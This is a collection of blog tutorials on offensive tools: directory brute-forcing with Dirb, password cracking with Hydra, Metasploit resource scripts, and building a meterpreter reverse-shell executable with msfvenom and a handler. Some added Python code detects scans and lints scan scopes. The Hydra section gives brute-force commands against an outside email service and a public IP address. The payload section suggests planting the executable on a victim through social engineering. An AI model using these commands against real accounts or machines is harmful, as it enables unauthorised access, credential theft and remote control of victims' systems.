Ruben Dario Caravajal Herrera

Posts by Ruben Dario Caravajal Herrera

Dirb is a web content scanner

Dirb is a web content scanner; its principal feature is finding hidden folders and objects within websites. Dirb does this with dictionary-based attacks against the server, mostly as plain HTTP requests.

Dirb comes with default wordlists to ease the process. Its main purpose is web application auditing: it helps professionals test the security controls that protect a website. Dirb occasionally uncovers holes that the classic vulnerability scanners miss, because Dirb looks for specific objects located on the website. It does not look for general vulnerabilities; its purpose is to find web content that may be vulnerable.

How Dirb works:

Dirb has an internal wordlist file that by default contains around 4000 words for brute-force attacks. Many larger and more current wordlists are available on the internet and can be used as well. Dirb tries every word in its wordlist against each directory or object of a server or website. A hit might be an admin panel or a subdirectory that is vulnerable to attack. The fundamental task is finding these objects, because they are hidden.

How to acquire it?

Download Dirb via Sourceforge: https://sourceforge.net/projects/dirb/

Using Dirb:

First, you need to download Dirb.

To uncompress the downloaded archive, use the following command:

sudo tar -xvzf dirb222.tar.gz

The Dirb folder is now uncompressed, and you can see it with the ls command.

Go to the dirb directory and make the configure script executable with the following command:

chmod u+x configure

Run configure and then type make:

Dirb is now installed, and you can use it with the following command:

./dirb URL

Testing for Special Vulnerable list:

Dirb can be used to test for specific vulnerable objects within particular types of web technologies. Every web technology has its own unique vulnerabilities; they are NOT all the same. Dirb can help search for the vulnerable objects specific to the technology in use. We should also mention that these tests are usually performed over the TCP ports that serve the web application, namely:

  • TCP/80 – HTTP
  • TCP/443 – HTTPs, SSL

These ports must be open for the web service to be reachable at all, so a firewall alone cannot do much to prevent attacks directed at them.

Dirb ships specific wordlists for these vulnerable, often hidden, objects. You can find them in:

cd wordlists/vulns

Then list the contents of that directory:

ls -l

There is a file for each of the specific technologies to test. If your web server is Apache and you want to test it, use apache.txt.

To run it:

./dirb http://webscantest.com wordlists/vulns/apache.txt
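From the defender's side, a Dirb run looks like one client producing a burst of 404/403 responses for paths it could not have learned from the site itself. The following detector is an added example (not part of the original post): it parses Apache combined-log lines and flags any client IP with a threshold of misses inside a sliding time window. The log lines, IPs and thresholds are constructed sample values.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed Apache "combined" log sample (not a real server log): a normal
# visitor at 10.0.0.5 and a dictionary scan from 10.0.0.9 probing the kind of
# paths found in Dirb-style wordlists.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /index.html HTTP/1.1" 200 2326 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Oct/2023:13:55:41 +0000] "GET /abuot.html HTTP/1.1" 404 196 "-" "Mozilla/5.0"
10.0.0.9 - - [10/Oct/2023:13:56:01 +0000] "GET /admin/ HTTP/1.1" 404 196 "-" "Mozilla/4.0"
10.0.0.9 - - [10/Oct/2023:13:56:02 +0000] "GET /backup/ HTTP/1.1" 404 196 "-" "Mozilla/4.0"
10.0.0.9 - - [10/Oct/2023:13:56:02 +0000] "GET /cgi-bin/ HTTP/1.1" 403 199 "-" "Mozilla/4.0"
10.0.0.9 - - [10/Oct/2023:13:56:03 +0000] "GET /.htaccess HTTP/1.1" 403 199 "-" "Mozilla/4.0"
10.0.0.9 - - [10/Oct/2023:13:56:04 +0000] "GET /server-status HTTP/1.1" 404 196 "-" "Mozilla/4.0"
10.0.0.9 - - [10/Oct/2023:13:56:05 +0000] "GET /test/ HTTP/1.1" 404 196 "-" "Mozilla/4.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

def parse_line(line):
    """Return (ip, timestamp, path, status) for one combined-log line, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return m.group("ip"), ts, m.group("path"), int(m.group("status"))

def find_enumeration(log_text, window_s=60, threshold=5):
    """Flag client IPs with at least `threshold` 403/404 responses inside any
    `window_s`-second sliding window; returns {ip: peak count} for those IPs."""
    recent = defaultdict(deque)  # ip -> timestamps of recent misses
    peaks = {}
    events = [e for e in map(parse_line, log_text.splitlines()) if e]
    for ip, ts, _path, status in sorted(events, key=lambda e: e[1]):
        if status not in (403, 404):
            continue
        q = recent[ip]
        q.append(ts)
        while (ts - q[0]).total_seconds() > window_s:
            q.popleft()
        if len(q) >= threshold:
            peaks[ip] = max(peaks.get(ip, 0), len(q))
    return peaks

if __name__ == "__main__":
    print(find_enumeration(SAMPLE_LOG))  # {'10.0.0.9': 6}
```

Tune `threshold` and `window_s` to the site's normal 404 rate; a single typo from a real visitor (10.0.0.5 above) stays below the bar while the scanner is flagged.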

Hydra

Hydra is a password cracking tool that is supported only on Linux systems. It comes pre-installed on Kali Linux and Parrot. If hydra is not already installed on your machine, installing it takes a single command, shown below.

Installing Hydra:

The installation process is quite simple: the following command installs all the packages required to use hydra.

apt-get install hydra

Hydra Options:

The syntax is simple: the name of the tool, followed by options, the host, and the service the attack is directed at, as shown in the example below:

hydra (options) host (service)

Hydra's main functions mostly rely on two flags:

  • -l: the user name to look for
  • -P: the password list that is used as the dictionary for the attack

These two flags point at the user and the file that guide the attack; an example of the syntax is shown below:

hydra -l user1 -P wordlist.txt <host> smb

The service can be omitted from the command line, but naming it helps the cracking process when we want to focus on a specific service. It is also useful to be specific about the folder that contains the wordlist file we want to use, which eases the process.

Creating your own wordlist:

A wordlist to serve as the dictionary for the attack can be generated with a program called crunch, which produces combinations of letters and numbers depending on the options you configure. This step is essential, because the wordlist is the key to the attack; testing different wordlists improves the reach of the brute-force attack.

Crunch installation process:

Crunch can be installed by typing the following command:

sudo apt-get install crunch

After installation we can use crunch to generate a text file, or pipe the characters into another program; an example can be seen in the picture below:

After the process finishes we can look for the file in the folder we selected:

Testing Hydra:

Now that we have explained the main characteristics of hydra, we will show a few examples of attacks on servers. The first is an attack on an FTP server, once we have created the wordlist and have the IP address assigned to the server. The attack can look like this:

As can be seen in the picture above, we managed to get the password for one of the users configured on the FTP server. In the example below, we repeat the process against an SMB service with the same result.

hydra -l user1 -P wordlist.txt smb://45.76.60.202

Other methodologies:

The next step is cracking the password of an email account. Email is usually handled by an SMTP service. With hydra we can specify the port on which this service listens; in the following example command the attack is directed at port 565 of smtp.gmail.com:

hydra -l jdoe@gmail.com -P /root/Desktop/wordlist.txt -S 565 smtp.gmail.com smtp

The last Hydra flag presented here is -x. At times a user has a ridiculously long and complicated password that dictionary attacks cannot crack; however, there is one method to which every password eventually falls: the brute-force attack. In a brute-force attack every combination is tried until the password is found. The CPU determines the speed, but in the long run the password will be cracked. Here is how the brute-force option is invoked in hydra:

hydra -l <user> -x <shortest length>:<longest length>:<character set> <host> <service>
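The post's claim that "the CPU determines the speed" is only half the story for an online attack: the server decides how many guesses it will accept. The following worked example, added here and not part of the original post, computes the candidate count for a -x <min>:<max>:<charset> range and compares the time to exhaust it with and without an account-lockout policy. The charset classes, the 100 guesses/s rate and the 5-attempts-per-15-minutes lockout are assumed values.

```python
import string

# Character classes a -x MIN:MAX:CHARSET brute force might be told to use
# (assumed classes; the post only says "letters and numbers").
CHARSETS = {
    "digits": string.digits,
    "lower": string.ascii_lowercase,
    "lower+digits": string.ascii_lowercase + string.digits,
    "all printable": string.ascii_letters + string.digits + string.punctuation,
}

def keyspace(charset_size, min_len, max_len):
    """Number of candidates a MIN:MAX brute force must try over a charset of
    `charset_size` symbols: the sum of charset_size**n for each length n."""
    if min_len < 1 or max_len < min_len:
        raise ValueError("length range must satisfy 1 <= min <= max")
    return sum(charset_size ** n for n in range(min_len, max_len + 1))

def effective_rate(raw_guesses_per_second, lockout_attempts=None, lockout_seconds=None):
    """Online guess rate once an account-lockout policy (at most
    `lockout_attempts` tries per `lockout_seconds`) is enforced, if any."""
    if lockout_attempts is None:
        return float(raw_guesses_per_second)
    return min(float(raw_guesses_per_second), lockout_attempts / lockout_seconds)

def worst_case_seconds(charset_size, min_len, max_len, guesses_per_second, **lockout):
    """Time to exhaust the whole keyspace at the effective guess rate."""
    return keyspace(charset_size, min_len, max_len) / effective_rate(guesses_per_second, **lockout)

def human(seconds):
    """Render a duration in the largest sensible unit, e.g. '3.2 days'."""
    for unit, size in (("years", 31_557_600), ("days", 86_400), ("hours", 3_600), ("minutes", 60)):
        if seconds >= size:
            return f"{seconds / size:.1f} {unit}"
    return f"{seconds:.1f} seconds"

if __name__ == "__main__":
    # Constructed scenario: 4 to 8 characters of lowercase+digits, 100 guesses/s
    # online, compared with a lockout of 5 attempts per 15 minutes.
    cs = len(CHARSETS["lower+digits"])
    print("candidates:", keyspace(cs, 4, 8))
    print("no lockout:", human(worst_case_seconds(cs, 4, 8, 100)))
    print("with lockout:", human(worst_case_seconds(cs, 4, 8, 100,
          lockout_attempts=5, lockout_seconds=900)))
```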


Final Considerations:

Passwords are indeed the most commonly used mode of authentication. Of course, the attacks could be directed at exploiting the system itself, but in my personal experience it is much easier to hack a specific account that is password protected or is located on a server.

This can compromise the whole system. There is a wide range of methods for cracking passwords. Another tool that serves this purpose is John the Ripper, which resembles Hydra in scope but focuses on testing the integrity of passwords. The methods discussed above include brute force, dictionary attacks, and attacks directed at people (phishing, social engineering and users' lack of awareness). All but the last can be executed with the software THC-Hydra (Hydra). Hydra can be combined with Nessus, a vulnerability scanner that often calls Hydra to complete its process. Below is an example video of hydra performing different attacks:

Creating a simple resource script to be used with Metasploit.

As penetration testers, or even when performing a simple or regular scan, we all know that tasks can become repetitive (e.g. when performing a pentest in a streamlined environment). Typing the Metasploit commands again and again, with minor changes, to attack a target can get tiresome. This is where resource scripts are useful: they let Metasploit automate the repetitive tasks at hand.

They are essentially batch scripts: a set of commands that are executed automatically and sequentially when you load the resource script in Metasploit. A resource script is created by chaining together a series of Metasploit console commands, mainly used for scanning purposes, and you can even embed Ruby directly to do things like call APIs, interact with objects in the database, and iterate actions.

As an example we are going to create a simple resource script that automates the auxiliary scan of an FTP service and reports which version of the FTP service the target is running.

The commands are basically the same ones you are accustomed to using in Metasploit, with the addition of the automation.

You can create the script in any text editor you feel comfortable with.

We create the script by typing Metasploit commands (the structure is the same), and the commands will be executed sequentially.

The first command we’ll use is the following:

msfconsole
use auxiliary/scanner/ftp/ftp_version

This loads the scanning module that will tell us which FTP version is running on the target, as we said before.

The next command is used to "see" which options you can set for the pentest in the script you are creating.

msf > use auxiliary/scanner/ftp/ftp_version
msf auxiliary(scanner/ftp/ftp_version) > show options

As a result you will see the options available for the FTP scanner. For this example the most important ones are RHOSTS, which selects the target host or range of machines, and THREADS.

So for the script, we can do the following:

use auxiliary/scanner/ftp/ftp_version
set RHOSTS 192.168.100.4 [target host]
set THREADS 10 [number of threads]

The thread count depends on the scale of the network, so if you are scanning a large network you have to increase the number of threads.

Something to consider is that you can change these values "on the fly": you don't have to retype the commands into the Metasploit console whenever you want to change the options you want to explore; you change them in the script and run it again.

Now we just execute the module with run (or, if you are using an exploit module, with exploit). As this is a simple resource script we can do the following:

use auxiliary/scanner/ftp/ftp_version
set RHOSTS 192.168.1.103
set THREADS 10
run

We save this text file as ftp_scanner.rc, for example with vim:

vim ftp_scanner.rc

use auxiliary/scanner/ftp/ftp_version
set RHOSTS 192.168.100.4
set THREADS 10
run

Then press Esc and type :w to write the file.

The extension .rc means resource script. Now we go to where the script is located so it can be run in Metasploit. In the terminal type:

cd (location of the script you just created)

Make sure that your Metasploit PostgreSQL database is built and already running. Now we can perform the pentest of the FTP service by running this script, with the chosen number of threads, against the RHOSTS target host.

We then type:

msfconsole -r ftp_scanner.rc


This will start the Metasploit Framework and launch the created resource script.
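Because a resource script runs every line without asking, a typo in RHOSTS sends the scan at the wrong network. The following linter is an added example (not part of the original post or of Metasploit): it parses the `use` and `set RHOSTS` lines of an .rc file and checks them against an assumed engagement policy (allowed module prefixes and an authorized target range), so the script is rejected before msfconsole -r ever runs it. The copies of ftp_scanner.rc and of the handler script below on this page are constructed from the text.

```python
import ipaddress

# Constructed copies of the resource scripts shown on this page.
FTP_SCANNER_RC = """\
use auxiliary/scanner/ftp/ftp_version
set RHOSTS 192.168.100.4
set THREADS 10
run
"""
HANDLER_RC = """\
use exploit/multi/handler
set LHOST 192.168.100.3
exploit -j -z
"""

# Assumed engagement policy for a scan-only job: module prefixes that may be
# loaded and the target ranges that are authorized.
POLICY = {
    "allowed_modules": ("auxiliary/scanner/",),
    "scope": [ipaddress.ip_network("192.168.100.0/24")],
}

def parse_rc(text):
    """Split a resource script into (command, argument-string) pairs."""
    cmds = []
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):  # skip blanks and comments
            parts = line.split(None, 1)
            cmds.append((parts[0], parts[1] if len(parts) > 1 else ""))
    return cmds

def lint_rc(text, policy=POLICY):
    """Return policy findings for a resource script; an empty list passes."""
    findings = []
    for cmd, args in parse_rc(text):
        if cmd == "use" and not args.startswith(policy["allowed_modules"]):
            findings.append(f"module not allowed: {args}")
        elif cmd == "set" and args.split(" ", 1)[0].upper() == "RHOSTS":
            for host in args.split()[1:]:
                try:
                    net = ipaddress.ip_network(host, strict=False)
                except ValueError:
                    findings.append(f"RHOSTS is not a plain IP/CIDR: {host}")
                    continue
                if not any(net.subnet_of(s) for s in policy["scope"]):
                    findings.append(f"RHOSTS out of scope: {host}")
    return findings
```

Under this policy lint_rc(FTP_SCANNER_RC) returns an empty list, while the handler script is rejected because exploit/multi/handler is not a scanner module.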

Advantages of the Resource Scripts

The interesting thing about this procedure is that after performing the scan and getting the results sorted and ready for assessment, if you want to change the IP or increase the threads you just edit the script and run it again.

The versatility of resource scripts lies in their ability to take advantage of many of the capabilities available in Metasploit and Ruby, whether you use them from the Metasploit console or from the Metasploit web interface.

The community of The Metasploit Framework has made available many resource scripts, so if you are a framework user, you can go to.

Here at Infosec Addicts, in our Pentesting Candidate Program and Ultimate Hacklab courses, you can get more information about creating these useful tools to facilitate any audit procedure or pentest using Metasploit. We sincerely hope you will join us in this quest of finding the best and most reliable solutions to perform a thorough and reliable pentest.

Data-mining a compromised host

In this post we are going to take a file (which can be .txt, .doc or .exe), inject a payload into it, then check which antivirus products detect it, and finally run the file on the victim and observe what happens.

What is a payload?

We can say that a payload is the harmful part that is activated when a piece of malware executes; besides raising privileges, it takes full advantage of the vulnerabilities found. In essence, the payload is the part of the malicious code within the exploit that is in charge of exploiting the vulnerability to the maximum.

Installing the tools on Ubuntu and Debian

This post does not focus on installing Metasploit, but we will do a little review so you know what it is about.

Open a Linux terminal and copy and paste the following command:

curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall

The result of the command will be the following:

If you get an error during the installation, the necessary documentation can be found at https://www.metasploit.com/.

There are many tools for creating a payload; a significant one is Metasploit. We will generate a payload to attack Windows 7.

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.100.3 -b "\x00" -f exe -o Meterpreter.exe

This is the file that we have created and that we will put on the victim machine.

touch meterpreter.rc
echo use exploit/multi/handler >> meterpreter.rc
echo set PAYLOAD windows/meterpreter/reverse_tcp >> meterpreter.rc
echo set LHOST 192.168.100.3 >> meterpreter.rc
echo set ExitOnSession false >> meterpreter.rc
echo exploit -j -z >> meterpreter.rc
cat meterpreter.rc

msfconsole -r meterpreter.rc

To put the payload on the victim’s machine, you can use social engineering or any other way. In this case, we will upload it with a meterpreter session to make it faster.

The following image shows the file on the Windows 7 machine.

This would be the result of the attack:

Checking the victim’s network settings

This is another command we can use for tests; it shows a list of files and directories.

In a meterpreter session, as in a Windows shell, you have a large number of commands that are very useful when making an attack.